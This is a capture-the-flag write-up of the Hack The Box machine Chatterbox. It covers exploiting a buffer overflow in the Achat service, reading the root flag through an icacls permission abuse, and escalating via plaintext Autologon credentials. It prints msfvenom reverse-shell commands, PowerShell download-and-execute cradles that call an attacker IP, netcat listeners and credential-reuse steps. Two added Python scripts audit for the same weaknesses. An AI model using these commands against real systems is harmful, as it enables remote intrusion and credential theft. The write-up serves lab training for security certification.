Hack The Box — Chatterbox
Chatterbox is a medium-difficulty Windows buffer overflow machine on Hack The Box and part of TJ Null's OSCP prep list. It is a buffer overflow machine in which we run our exploit against the Achat service. We also abuse file permissions with icacls to read the root flag. I will be covering both ways to solve this machine.
NOTE: This box is highly unstable and the only open ports are 9255 and 9256. So first run nmap against those two ports and check that the Achat service is running, instead of doing a full port scan (-p-). If the Achat service is not running, restart the machine. Users have often reported losing their shells as well.
The only open ports are 9255 and 9256, which run an unusual service called Achat. A quick search shows that it is vulnerable to buffer overflow attacks.
We use searchsploit to look for exploits for the Achat service; there is one, and we download it with -m, which saves it as 36025.py by default.
If we open the exploit code, we see a commented-out msfvenom command (#) that the author left for us to generate the shellcode.
However, we have to make some changes to the script. Instead of the windows/exec payload the script uses by default to run calc.exe, we use a windows/shell_reverse_tcp payload (-p), remove the CMD=calc.exe option since we are no longer executing a program, and add LHOST and LPORT.
THIS IS WHAT OUR FINAL MSFVENOM COMMAND SHOULD LOOK LIKE:
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.22 LPORT=7777 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Copy the generated shellcode and replace the default buf section of the script with it.
NOTE: Further down in the default script there is a maximum length limit of 1152 bytes on the payload (refer to the image below). Anything that exceeds it will probably not work, so keep that in mind when generating the reverse shell with msfvenom. (Luckily the msfvenom command above produced a shellcode of around 774 bytes, so it is within the limit.)
We also have to change the IP and port in the script to those of our target.
Now start a netcat listener on port 7777 and finally run the exploit with: python 36025.py
AND WE HAVE A SHELL !!!
We can now run commands like whoami /priv and systeminfo to find out more about our target. We can also run scripts like PowerUp.ps1 or winPEAS.
It seems that Potato attacks won't work due to lack of privileges: SeImpersonatePrivilege is not enabled, so we can't use the Juicy Potato exploit to escalate privileges.
In the systeminfo output, look at the HOTFIX(S) section, which is basically the list of installed patches. We see a lot of patches on the system, so a kernel exploit probably won't work; otherwise we could have found one by searching for the system build. Anyway, let's look at the directories.
We find root.txt in the Administrator's Desktop folder, but we are unable to read it. The odd part is that we can enter the Administrator folder at all: normally we do not have permission to access it and get access denied (if you have solved other boxes on HTB, you will understand).
Let's see what permissions are set on this root.txt file. We can use icacls to view them, and we see that Administrator has (F) Full access to root.txt.
(However, don't forget that we are still not Administrator; we are currently a normal user called Alfred.)
Let's also run icacls on the current directory: since we were able to enter it as the regular user Alfred, we must have some access to it. And voilà, Alfred has (F) Full access to the current directory. In fact Alfred has been configured to own the root.txt file, since the entry carries (OI), Object Inherit, which propagates it to the files inside the directory. For more information, refer to an icacls guide.
If we search for how to grant permission to a user with icacls, we find this on Stack Overflow:
So let's grant ourselves (Alfred) access to it using the following command. And finally we are able to read the root flag.
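As an added example (my own code, not from this writeup), a small Python audit that parses icacls output and flags exactly the situation described above: a non-admin user holding Full control with (OI)(CI) on a directory inside another user's profile. The icacls text it checks is constructed to match the permissions described, not captured from the box.

```python
import re
# icacls prints "<path> <principal>:(flags)(perm)" and pads further ACEs of the same object
# to the column right after the path; the parser relies on that alignment to split the path.
INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I"}   # inheritance flags, not permissions
STRONG_RIGHTS = {"F", "M", "W", "WDAC", "WO"}    # enough to alter the content or the ACL
ADMIN_PRINCIPALS = {"BUILTIN\\Administrators", "NT AUTHORITY\\SYSTEM", "CREATOR OWNER"}
ACE_RE = re.compile(r"^(?P<who>[^:]+):(?P<rights>(?:\([^)]*\))+)$")
PROFILE_RE = re.compile(r"^[A-Za-z]:\\Users\\([^\\]+)", re.IGNORECASE)

def parse_icacls(output):
    """Map each path to a list of (principal, inheritance flags, rights) tuples."""
    acl, lines, path = {}, output.splitlines(), ""
    for i, raw in enumerate(lines):
        if not raw.strip() or raw.startswith("Successfully processed"):
            continue
        if raw.startswith(" "):                    # continuation line: ACE only
            ace = raw.strip()
        else:                                      # first line of an object: "<path> <ace>"
            nxt = lines[i + 1] if i + 1 < len(lines) else ""
            cut = len(nxt) - len(nxt.lstrip(" ")) if nxt.startswith(" ") else raw.find(" ") + 1
            path, ace = raw[:cut].rstrip(), raw[cut:].strip()
            acl[path] = []
        m = ACE_RE.match(ace)
        if m:
            parts = re.findall(r"\(([^)]*)\)", m.group("rights"))
            acl[path].append((m.group("who"), {p for p in parts if p in INHERIT_FLAGS},
                              {r for p in parts if p not in INHERIT_FLAGS for r in p.split(",")}))
    return acl

def audit_profile_acl(acl):
    """Flag non-admin principals holding strong rights inside another user's profile. An (OI)/(CI)
    entry on a directory propagates to its children, and Full control on the directory is what
    lets the holder re-grant itself access to a file inside it."""
    findings = []
    for path, aces in acl.items():
        owner = PROFILE_RE.match(path)
        for who, flags, rights in aces:
            if owner is None or who in ADMIN_PRINCIPALS or who.lower().endswith("\\" + owner.group(1).lower()):
                continue
            if rights & STRONG_RIGHTS:
                scope = "propagates to children" if flags & {"OI", "CI"} else "this object only"
                findings.append(f"{who}: {','.join(sorted(rights & STRONG_RIGHTS))} on {path} ({scope})")
    return findings

# Constructed sample in icacls layout (not captured from the box): Alfred holds (OI)(CI)(F) on
# the Desktop directory while root.txt itself carries no entry for him.
P1 = r"C:\Users\Administrator\Desktop"
PAD = " " * (len(P1) + 1)
SAMPLE_ICACLS = "\n".join([P1 + r" NT AUTHORITY\SYSTEM:(OI)(CI)(F)",
    PAD + r"CHATTERBOX\Administrator:(OI)(CI)(F)", PAD + r"CHATTERBOX\Alfred:(OI)(CI)(F)",
    "", P1 + r"\root.txt CHATTERBOX\Administrator:(F)"])
```

Running `audit_profile_acl(parse_icacls(SAMPLE_ICACLS))` yields a single finding for Alfred on the Desktop directory and none for root.txt, which is the defender's view of why the icacls grant in the writeup succeeds.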
ALTERNATE METHOD- POWERSHELL
We can also try the windows/powershell_reverse_tcp payload (-p) instead of the windows/shell_reverse_tcp used earlier:
This part of the writeup has been taken from Rana Khalil's writeup as part of my note-keeping. Since I was unable to access the box as it crashed, I was unable to cover it in the writeup.
(Link to Rana Khalil's writeup: https://ranakhalil101.medium.com/hack-the-box-chatterbox-writeup-w-o-metasploit-c8421ac09318)
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=10.10.14.22 LPORT=6666 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
HOWEVER WE SEE THAT THE PAYLOAD SIZE EXCEEDS THE SIZE LIMIT MENTIONED IN THE EXPLOIT !!!
So instead, we’ll just use the windows/exec module to download and execute the Nishang reverse shell.
Download the Nishang repository and copy the Invoke-PowerShellTcp.ps1 script into your current directory.
cp ../../tools/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell.ps1
Add the following line to the end of the script with the attack machine configuration settings.
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.7 -Port 1234
When called, this sends a reverse shell back to our attack machine on port 1234.
Set up a listener to receive the reverse shell.
nc -nlvp 1234
Next, use msfvenom to generate a payload that downloads the PowerShell script and executes it.
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.7:5555/shell.ps1')" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
We get back the following result.
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 684 (iteration=0)
x86/unicode_mixed chosen with final size 684
Payload size: 684 bytes
Final size of python file: 3330 bytes
buf = b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
Good! The payload size is 684 bytes, so it’s within the limit. Copy the payload and add it in place of the payload included in the exploit.
Start up a python server in the directory that the PowerShell script resides in.
python -m SimpleHTTPServer 5555
Run the exploit.
root@kali:~/Desktop/htb/chatterbox# python 36025.py
We get a PowerShell shell!
We’ll use the PowerUp.ps1 script to determine if there are any misconfigurations that lead to privilege escalation.
Upload and run the script on the target machine.
PS C:\Users\Alfred\Desktop> iex(new-object net.webclient).downloadstring('http://10.10.14.7:5555/PowerUp.ps1')
PS C:\Users\Alfred\Desktop> Invoke-AllChecks
We get back two interesting results.
[*] Checking for Autologon credentials in registry...
DefaultDomainName :
DefaultUserName : Alfred
DefaultPassword : Welcome1!
AltDefaultPassword :
[*] Checking for unattended install files...
UnattendPath : C:\Windows\Panther\Unattend.xml
Viewing the Unattend.xml file, we see that the password was redacted. So let's focus on the Autologon credentials. The default username is "Alfred" and the default password is "Welcome1!". I don't have much experience with Windows, so I googled "Autologin credentials" to learn more about it.
As stated in the article, these credentials are stored in the registry in plain text. The manual commands for extracting these credentials are:
PS C:\Windows\system32> (Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -ErrorAction SilentlyContinue).DefaultUserName
Alfred
PS C:\Windows\system32> (Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -ErrorAction SilentlyContinue).DefaultPassword
These credentials are set by the administrator. Since users have a tendency to reuse passwords, let’s see if the administrator account is set to the same password.
To do that, first run the following command to convert the plain text string “Welcome1!” into a secure string and store the result in the $password variable.
$password = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
- ConvertTo-SecureString: Converts plain text to secure strings.
- -AsPlainText: Specifies a plain text string to convert to a secure string.
- -Force: Confirms that you understand the implications of using the AsPlainText parameter and still want to use it.
Second, create a new object to store these credentials.
$cred = New-Object System.Management.Automation.PSCredential('Administrator', $password)
Third, we’ll use these credentials to start PowerShell and send a (hopefully privileged) reverse shell back to our attack machine.
In the attack machine, copy the shell.ps1 script we used earlier and save it in the file shell-admin.ps1.
cp shell.ps1 shell-admin.ps1
Change shell-admin.ps1 to send a reverse shell to our attack machine on port 6666.
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.7 -Port 6666
Set up a python server in the directory that the script resides in.
python -m SimpleHTTPServer 5555
Set up a listener to receive the reverse shell.
nc -nlvp 6666
On the target machine, use the credentials to start PowerShell to download the shell-admin.ps1 script, run it and send a reverse shell back to our attack machine.
Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.7:5555/shell-admin.ps1')" -Credential $cred
We get a shell with administrator privileges!
Now we can view the root.txt flag without having to change the ACL permissions on it.
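As an added defensive check (my own code, not from either writeup), a Python audit of the Winlogon values that Autologon stores in clear text, as found by PowerUp above. The sample snapshot is constructed from the values PowerUp reported; the AutoAdminLogon value and the read_winlogon helper are my assumptions, not something shown on the page.

```python
import sys

# HKLM subkey where Winlogon keeps the automatic-logon settings (the key queried above).
WINLOGON_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
NAMES = ("AutoAdminLogon", "DefaultUserName", "DefaultDomainName", "DefaultPassword", "AutoLogonCount")

def assess_autologon(values):
    """Return (risk, findings) for a dict of Winlogon value name -> data (absent names omitted)."""
    findings = []
    enabled = str(values.get("AutoAdminLogon", "0")).strip() == "1"
    user = values.get("DefaultUserName") or ""
    password = values.get("DefaultPassword")
    if password is not None:
        # The DefaultPassword registry value is readable by any local user via Get-ItemProperty.
        findings.append(f"DefaultPassword for '{user}' is stored in clear text; remove the value "
                        "and set AutoAdminLogon to 0, or keep the secret in LSA instead")
    if enabled and password is None:
        # Sysinternals Autologon stores the password as the LSA secret 'DefaultPassword',
        # which only SYSTEM can read: the safer of the two layouts, but still worth knowing about.
        findings.append("AutoAdminLogon=1 with the password held in LSA secrets, not the registry value")
    if enabled and not user:
        findings.append("AutoAdminLogon=1 but DefaultUserName is empty: autologon is misconfigured")
    if enabled and values.get("AutoLogonCount") is not None:
        findings.append(f"AutoLogonCount={values['AutoLogonCount']}: Winlogon disables autologon at 0")
    risk = "high" if password is not None else ("medium" if enabled else "none")
    return risk, findings

def read_winlogon():
    """Read the values from the live registry; hypothetical helper, only meaningful on Windows."""
    if sys.platform != "win32":
        raise OSError("live registry read requires Windows")
    import winreg  # standard library, present on Windows builds of Python only
    out = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, WINLOGON_KEY) as key:
        for name in NAMES:
            try:
                out[name] = winreg.QueryValueEx(key, name)[0]
            except FileNotFoundError:   # value not set on this host
                pass
    return out

# Constructed snapshot mirroring the PowerUp output above; AutoAdminLogon is assumed to be "1".
SAMPLE_WINLOGON = {"AutoAdminLogon": "1", "DefaultDomainName": "",
                   "DefaultUserName": "Alfred", "DefaultPassword": "Welcome1!"}
```

On a Windows host, `assess_autologon(read_winlogon())` runs the same check against the live key; on the sample it reports "high" because the clear-text DefaultPassword is present.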
In this box we learnt that:
- We can run a buffer overflow exploit against a vulnerable service after making certain changes to the exploit. However, we need to make sure the shellcode we generate with msfvenom stays within the maximum length limit.
- There are multiple payloads that can be used with msfvenom, such as windows/shell_reverse_tcp, windows/powershell_reverse_tcp, or windows/exec CMD="powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.22:8000/Invoke-PowerShellTcp.ps1')" (adjust the addresses accordingly).
- We can use icacls to view or grant file permissions to users.
- We can abuse the Windows Autologon feature to view credentials in plain text, and sometimes reuse those user credentials to log in as admin, since the admin often reuses the user's password.
I hope you find this writeup helpful, and make sure to follow me here on Medium for more CTF writeups.